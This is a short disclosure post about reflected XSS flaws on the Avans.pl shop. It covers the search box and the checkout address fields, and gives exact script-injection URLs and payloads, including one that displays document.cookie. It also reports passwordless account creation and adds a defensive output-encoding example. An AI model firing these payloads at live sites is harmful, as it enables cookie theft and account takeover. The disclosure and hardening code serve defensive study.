Multiple XSS in Avans.pl

A simple reflected XSS bug in the Avans search box:

http://www.avans.pl/produkty.html?query=XSS"/><script>alert('XSS')</script>

Another set of unfiltered input fields was in:

https://www.avans.pl/koszyk-logowanie.html

which is step 3/4 after adding a product to the cart. Filling those fields with a standard value of:

"/><script>alert(document.cookie)</script>

redirects to:

https://www.avans.pl/koszyk-adres.html

which pops an alert box.
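Both the search box and the cart form fields fail the same way: the submitted value reaches the page without output encoding, so the leading `"/>` closes the attribute and tag it was placed in. The sketch below is an added example, not Avans.pl's code; the `<input value="...">` markup and every function name are assumptions inferred from the shape of the payloads above. It renders a field with and without HTML encoding and checks whether the value escapes its attribute.

```javascript
// Added example: markup and function names are assumptions, not Avans.pl's code.

// Vulnerable pattern: the request value is concatenated into a quoted attribute.
function renderFieldUnsafe(name, value) {
  return '<input type="text" name="' + name + '" value="' + value + '"/>';
}

// Encode every character that can end an attribute value or open a tag.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened pattern: same markup, value encoded at the point of output.
function renderFieldSafe(name, value) {
  return '<input type="text" name="' + name + '" value="' + escapeHtml(value) + '"/>';
}

// Comparison helper: after the first closing quote of value="...", a correctly
// rendered field has only the tag terminator left. Anything else means the
// value ended the attribute early and injected markup of its own.
function breaksOutOfAttribute(html) {
  const m = /value="([^"]*)"(.*)$/s.exec(html);
  return m !== null && m[2] !== '/>';
}

// The two values quoted in this post, plus a harmless one for contrast.
const SAMPLES = [
  ['query', `XSS"/><script>alert('XSS')</script>`],
  ['field', `"/><script>alert(document.cookie)</script>`],
  ['query', 'laptop 15"'],
];

function report() {
  return SAMPLES.map(([name, value]) => ({
    value,
    unsafeBreaksOut: breaksOutOfAttribute(renderFieldUnsafe(name, value)),
    safeBreaksOut: breaksOutOfAttribute(renderFieldSafe(name, value)),
  }));
}

console.log(report());
```

The third sample shows that the unencoded version also mangles an ordinary search term containing a double quote, so the encoding is needed for correctness as well as for security.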

Bonus: It was possible to create an account without a password.

The bugs were short-lived thanks to a quick reaction from Avans.pl. Good job.
